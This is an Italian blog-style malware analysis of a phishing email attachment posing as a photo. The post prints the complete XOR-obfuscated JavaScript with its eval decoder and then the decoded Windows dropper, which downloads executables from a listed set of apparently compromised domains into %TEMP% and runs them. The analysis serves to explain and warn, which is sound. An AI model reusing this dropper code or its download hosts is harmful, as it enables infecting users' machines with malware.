Ricevo da una certa “Gabriella Ferrari” (una volta i nomi erano più esotici), una simpatica e-mail con oggetto “iPhone 6s”, con un allegato uno zip dal nome IMG_8779.zip. Cosa sarà mai? Una foto osè destinata ad altri e che posso sbirciare? Niente di tutto questo l’e-mail contiene un file di testo con estensione js. Lo apro con notepad ed ecco il suo contenuto:
var key = ‘RgUfsrM3’;var b = ‘6\x11=?*\x27\x04y=\x10\x12^SOm\x114Qw]~x+F<\x04!\x0f\x1c\x1cmW$\x0f\x0c?&;\x07\x5c% }54(\x0eJ:+&>2=,P4!|F\x08\x7fG\x13rGu\x10\x12\x00mW$\x0f\x0c?&;\x07\x5c% aFNRov\x1c3\x1d#?”cp\x1d*u.63\x01z\x1c \x066!;\x03t\x05(\x07- :\x02c\x01I\x16)>]:C\x7f\x04:\x08\x07\x17#G}\x13=\x03\x1e\x17>\x1c&\x154\x10\x16\x1e`Q>\x082\x01\x16\x00mg\x07 \x07\x27;=\x19v\x1e4{%<?mD%\x10{\x00\x1f\x1d?Z3\x097\x14\x06\x17#Z<\x00{\x05\x1c\x1fmy\x07&\x192<%\x08a\x065\x1c\x27=5\x01v|$\x1a+S?\x0cr\x19$\x1447\x5c\x0e|\x1fG”\x11\x04\x5c\x27R9\x0e8\x04\x1c\x019\x1d”\x0bu2;7\x1bz\x1e+\x14!6$\x08g\x175\x1c(2 \x14{\x1d4\x05/\x273\x01\x1d\x11(\x18F;3\x1dc\x0b”\x004<!\x19|\x02I\x16)>Pc@”\x0b<\x12[Pm\x11{\x5cXlSRm\x13;\x01uN 5\x17p+\x0f\x19\x15+3\x02R1\x01\x13FNOm\x11pNu\x1d~xm\x13rGuFSR8e\x165\x05\x0d!\x16\x05]rZuD]\x175Vp\x5cXlSRm\x13/G0\x0a\x00\x17mH_muFSRm\x13rG 07 \x1dX\x00\x03\x1d\x08SOm\x11|\x171\x00QI@9rGuF\x0eI@9rGuF\x15\x1d?\x13z\x114\x14S3\x05@3?-\x056\x01\x05]rZuVHR\x0c{!\x06\x0d\x1e\x107>{<GiF\x17\x04%j\x0b2\x1c,\x1c\x05\x0a\x07|\x0b0\x08\x14\x06%\x08r&\x1d\x15\x12*5P\x17\x14\x1d\x08XYd\x13)j_FSRm\x13rGu\x10\x12\x00mZ\x11?\x1f(\x094%~<!u[S\x1c(Dr&6\x12\x1a\x04(k\x1d\x05?\x03\x10\x06e\x11\x0546\x14\x1a\x029\x1d\x01\x0f0\x0a\x1fPd\x08_muFSRm\x13rG%\x1f%4%{“\x1d2\x0d5:m\x0er\x0e\x16>9<7u:*; ]75C3\x091#\x1d\x04$A=\x098\x03\x1d\x06\x1eG \x0e;\x01\x00Zo\x16\x06″\x186VPd\x13yGw:/Pm\x18r*4\x12\x1b\x5c?\x5c\x27\x091NB\x17u\x13xG\x18\x07\x07\x1acA3\x091\x09\x1eZd\x1arLu\x13%6\x1fc951.\x1dI@9rGuFSRm\x13\x07\x14\x18\x07\x173\x1dq\x08&\x1b \x19\x08\x13oG3\x07\x1f\x01(\x08_muFSRm\x13rG1\x10\x1b+\x14f\x1b-:\x114Bm\x0er\x090\x11S3.G;\x110><\x10\x27V1\x13}D>!\x15~\x1eU{>>>\x05g\x067wOH\x7fG\x13rGuFSRmW$\x0f\x0c?&;\x07\x5c% eH\x1c\x1c?V3\x03,\x15\x07\x139V1\x0f4\x08\x14\x17m\x0er\x01 \x08\x10\x06$\x5c<O|F\x08\x7fG\x13rGuFSRm\x13rGu\x0f\x15Re\x07rZhF\x17\x04%j\x0b2\x1c,\x1c\x05\x0a\x03|\x150\x07\x17\x0b\x1eG3\x130FUTm\x01bWu[NR)E:>\x0c3:8″D\x15W{\x15\x07\x139F!Nu\x1d~xm\x13rGuFSRm\x13rGuFSR;R G1\x10\x1b+\x14f\x1b-:\x114Cm\x0er\x090\x11S3.G;\x110><\x10\x27V1\x13}D26\x02w\x10I\x06\x12\x01\x17,^pNnkyRm\x13rGuFSRm\x13rGuFS\x1b+\x13z\x03#\x0e*+\x18z\x18\x08″!B\x5c”C7\x09}O_R)E:>\x0c3:8″D\x15V{\x12\x0a\x02(\x13oGdJS\x16;[\x0b>\x00/9\x1d:tcI”\x14\x1a\x06(\x1b6\x11=?*\x27\x04y=\x10\x12V] (@”\x08;\x15\x160″W+NyFF\x17~\x13nG1\x10\x1b+\x14f\x1b-:\x114Cc@;\x1d0OS\x09@9rGuFSRm\x13rGuFSRm\x13rGuF&\x01\x00R6&\x05$)3\x03u\x01\x0c\x10FNR9A\x27\x02nkyRm\x13rGuFSRm\x13rGuFSRm\x13r\x03#\x0e*+\x18z\x18\x08″!B\x5c=\x5c!\x0e!\x0f\x1c\x1cm\x0erWnkyRm\x13rGuFSRm\x13rGuFSRm\x13r\x03#\x0e*+\x18z\x18\x08″!B\x5c>R$\x02\x01\x095\x1b!Vz\x17,05\x1a\x05C(\x00> ;^m\x01{\x5cXlSRm\x13rGuFSRm\x13rGuFSRm\x13&\x15,F\x08\x7fG\x13rGuFSRm\x13rGuFSRm\x13rGuFSRmZ\x11?\x1f(\x094%~<!{4\x06\x1ceC+1\x13\x0e;\x027T9!\x1dJSCa\x13bNXlSRm\x13rGuFSRm\x13rGuFSRm\x13/G6\x07\x07\x11%\x13z\x03#\x0e*+\x18z\x18\x08″!A[mH/j_FSRm\x13rGuFSRm\x13rGu\x1b~xm\x13rGuFSRm\x13rGuFSR)E:>\x0c3:8″D\x15V{\x05\x1f\x1d>VzNXlSRm\x13rGuFSRm\x13/j_FSRm\x13rGu\x1bH\x7fG\x13rGuFSRmG \x1eu\x1d~xm\x13rGuFSRm\x13rG1\x10\x1b+\x14f\x1b-:\x114Bc\x5c”\x02;NQ5\x08gpKuD\x1b\x069ChHzDSYmW$\x0f\x0c?&;\x07\x5c% a=2:>R\x0a\x1f6#\x00:#nrLuD\x5c\x15(G|\x17=\x16L\x07\x07` \x09/5\x1cOo\x13yG\x18\x07\x07\x1acA3\x091\x09\x1eZd\x13yGw@\x18\x174\x0epG~F\x17\x04%j\x0b2\x1c,\x1c\x05\x0a\x0brLu54(\x0eJ:+&>2=,P4!yF\x15\x13!@7NnkyRm\x13rGuFSRm\x13r\x03#\x0e*+\x18z\x18\x08”!C\x5c>V<\x03}OH\x7fG\x13rGuFSRmNr\x044\x12\x10\x1am\x1b6\x11=?*\x27\x04y=\x10\x12UZR6N_muFSRm\x13rG<\x00SZ\x18@\x1f\x061\x27#0\x17r\x1c!\x06\x0d6[mH_muFSRm\x13rGuFSR/A7\x06>]~xm\x13rGuFSR0\x08_muFSR0\x08_m(]~x)E:>\x0c3:8″D\x15OwDZI@96\x11=?*\x27\x04y=\x10\x12NQT=W4Z<69\x0b\x1e\x5c0\x06\x11DZI’;for (var XHMayGnPPWU5 = “”, XHMayGnPPWU6 = 0, XHMayGnPPWU7 = 0; XHMayGnPPWU6 < b.length; XHMayGnPPWU6++) XHMayGnPPWU5 += String.fromCharCode(b.charCodeAt(XHMayGnPPWU6) ^ key.charCodeAt(XHMayGnPPWU7)), XHMayGnPPWU7++, XHMayGnPPWU7 == key.length && (XHMayGnPPWU7 = 0);eval(XHMayGnPPWU5);
Sembra tutto senza senso, ma mettendolo in una forma un po’ più leggibile:
var key = ‘RgUfsrM3’;
var b = ‘6\x11=?*\x27\x04y=\x10\x12^SOm\x114Qw]~x+….’;
for (var XHMayGnPPWU5 = “”, XHMayGnPPWU6 = 0, XHMayGnPPWU7 = 0; XHMayGnPPWU6 < b.length; XHMayGnPPWU6++)
XHMayGnPPWU5 += String.fromCharCode(b.charCodeAt(XHMayGnPPWU6) ^ key.charCodeAt(XHMayGnPPWU7)), XHMayGnPPWU7++, XHMayGnPPWU7 == key.length && (XHMayGnPPWU7 = 0);eval(XHMayGnPPWU5);
Si vede che è un semplice programma che decodifica la stringa b in base alla chiave key, e poi chiede all’interprete Javascript di eseguire il programma così ottenuto. Cioè:
dvhYYUIJowG8 = “f6”;
function dvhYYUIJowG(SGZCyhLsXAOacfF) {
var dvhYYUIJowG4 = “ENTHELP.COM HEALINGSPRINGWORKSHOPS.COM/wp-content/themes/travel-blogger TUGRAHOTELS.COM www.florianbruening.com JUALTOWERTRIANGLE.COM MAAKCARD.COM www.jakimbost.pl THEVILLAGEVETERINARYHOSPITAL.COM HAPPYEUROSTOP.COM”.split(” “);
if (SGZCyhLsXAOacfF == “”) { uVDRPkRdHn = “.exe”; } else { uVDRPkRdHn = “.pdf”; };for (var AHsaXxcEsHn = 0; AHsaXxcEsHn < dvhYYUIJowG4.length; AHsaXxcEsHn++) {
var iCXJNzFhMnF = new ActiveXObject(“WScript.Shell”);
pyVFhHpzgkFH = iCXJNzFhMnF.ExpandEnvironmentStrings(“%TEMP%”) + “\\” + Math.round(1e8 * Math.random()) + uVDRPkRdHn;
UsMadAPBZANFSkE = false;
dvhYYUIJowG0 = new ActiveXObject(“MSXML2.XMLHTTP”);
dvhYYUIJowG0.onreadystatechange = function() {
if (4 == dvhYYUIJowG0.readyState && 200 == dvhYYUIJowG0.status) {
var dvhYYUIJowG1 = new ActiveXObject(“ADODB.Stream”);
if (dvhYYUIJowG1.open(), dvhYYUIJowG1.type = 1, dvhYYUIJowG1.write(dvhYYUIJowG0.ResponseBody), 5e3 < dvhYYUIJowG1.size) {
UsMadAPBZANFSkE = true;
dvhYYUIJowG1.position = 0;
dvhYYUIJowG1.saveToFile(pyVFhHpzgkFH, 2);
try {
iCXJNzFhMnF.Run(pyVFhHpzgkFH, 1, 0)
}
catch (dvhYYUIJowG2) {}
}
dvhYYUIJowG1.close()
}
};
try {
dvhYYUIJowG0.open(“GET”, “http://” + dvhYYUIJowG4[AHsaXxcEsHn] + “/get.php?uJSrnzSo=” + Math.random() + “&key=” + dvhYYUIJowG8 + SGZCyhLsXAOacfF, false);
dvhYYUIJowG0.send(); }
catch (dvhYYUIJowG3) {}
if (UsMadAPBZANFSkE) { break; };
}; //for
}; //functiondvhYYUIJowG(“”);
dvhYYUIJowG(“&pdf=iPJySobaD”);
Il simpatico programmino si occupa di collegarsi alle varie url contenute nella stringa dvhYYUIJowG4 e di scaricare nella cartella temp corrente un file ricevuto da questi siti e poi eseguirli. La maggior parte di questi siti risultano segnalati a Chrome come diffusori di malware (Internet Explorer no) per cui vengono bloccati, ma continuando comunque e scaricando manualmente questi programmi, tentano di farsi passare come aggiornamenti di prodotti leciti, tipo Acrobat Reader. Abbastanza ingegnoso, ma come si vede dallo script finale, l’attacco è destinato ad utilizzare alcune caratteristiche di Internet Explorer, e funziona solo se i Javascript sono abilitati come script di sistema.